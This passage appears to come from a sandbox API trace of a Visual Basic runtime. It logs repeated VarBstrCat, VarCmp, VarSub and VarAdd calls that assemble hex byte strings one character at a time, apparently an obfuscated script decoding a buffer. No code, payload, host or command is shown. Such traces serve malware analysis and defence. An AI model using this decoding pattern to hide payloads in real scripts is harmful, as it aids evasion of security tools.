pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.255] VarBstrCat (in: bstrLeft="&Ha", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.255] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.255] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.255] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.255] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.255] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.255] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.255] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.255] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.255] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.255] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.255] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.256] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.256] VarBstrCat (in: bstrLeft="&Ha", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.257] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.257] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.257] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.257] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.257] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.257] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.257] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.257] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.257] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.257] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.257] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.258] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.258] VarBstrCat (in: bstrLeft="&Ha", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.258] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.258] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.258] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.258] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.258] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.258] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.258] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.258] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.258] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.258] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.258] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.258] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.258] VarBstrCat (in: bstrLeft="&Ha", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.258] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.258] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.258] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.258] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.259] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.259] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.259] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.259] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.259] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.259] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.259] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.259] VarBstrCat (in: bstrLeft="&H", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.259] VarBstrCat (in: bstrLeft="&H1", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.259] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.259] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.259] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.259] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.259] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.259] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.259] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.259] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.260] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.260] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.260] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.260] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.260] VarBstrCat (in: bstrLeft="&Hb", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.260] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.260] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.260] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.260] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.260] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.260] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.260] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.260] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.260] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.260] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.260] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.260] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.260] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.260] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.260] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.261] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.261] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.261] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.261] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.261] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.261] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.261] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.261] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.261] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.261] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.261] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.261] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.261] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.261] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.261] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.261] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.261] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.261] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.261] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.261] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.261] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.262] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.262] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.262] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.262] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.262] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.262] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.262] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.262] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.262] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.262] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.262] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.262] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.262] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.262] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.262] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.262] VarBstrCat (in: bstrLeft="&H7", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.262] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.262] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.262] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.262] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.262] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.263] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.263] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.263] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.263] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.263] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.263] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.263] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.263] VarBstrCat (in: bstrLeft="&H3", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.263] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.263] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.263] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.263] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.263] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.263] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.263] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.263] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.263] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.263] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.263] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.264] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.264] VarBstrCat (in: bstrLeft="&H7", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.264] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.264] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.264] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.264] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.264] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.264] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.264] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.264] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.264] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.264] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.264] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.264] VarBstrCat (in: bstrLeft="&H", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.264] VarBstrCat (in: bstrLeft="&H8", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.264] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.264] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.264] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.264] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.264] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.264] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.264] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.264] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.265] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.265] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.265] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.265] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.265] VarBstrCat (in: bstrLeft="&Hf", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.265] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.265] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.265] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.265] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.265] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.265] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.265] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.265] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.265] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.265] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.265] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.265] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.265] VarBstrCat (in: bstrLeft="&H7", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.265] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.266] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.266] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.266] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.266] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.266] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.266] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.266] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.266] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.266] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.266] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.266] VarBstrCat (in: bstrLeft="&H", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.266] VarBstrCat (in: bstrLeft="&H0", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.266] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.266] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.266] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.266] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.266] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.266] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.266] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.266] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.266] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.266] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.267] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.267] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.267] VarBstrCat (in: bstrLeft="&Hc", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.267] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.267] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.267] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.267] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.267] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.267] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.267] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.267] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.267] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.267] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.267] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.267] VarBstrCat (in: bstrLeft="&H", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.267] VarBstrCat (in: bstrLeft="&H2", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 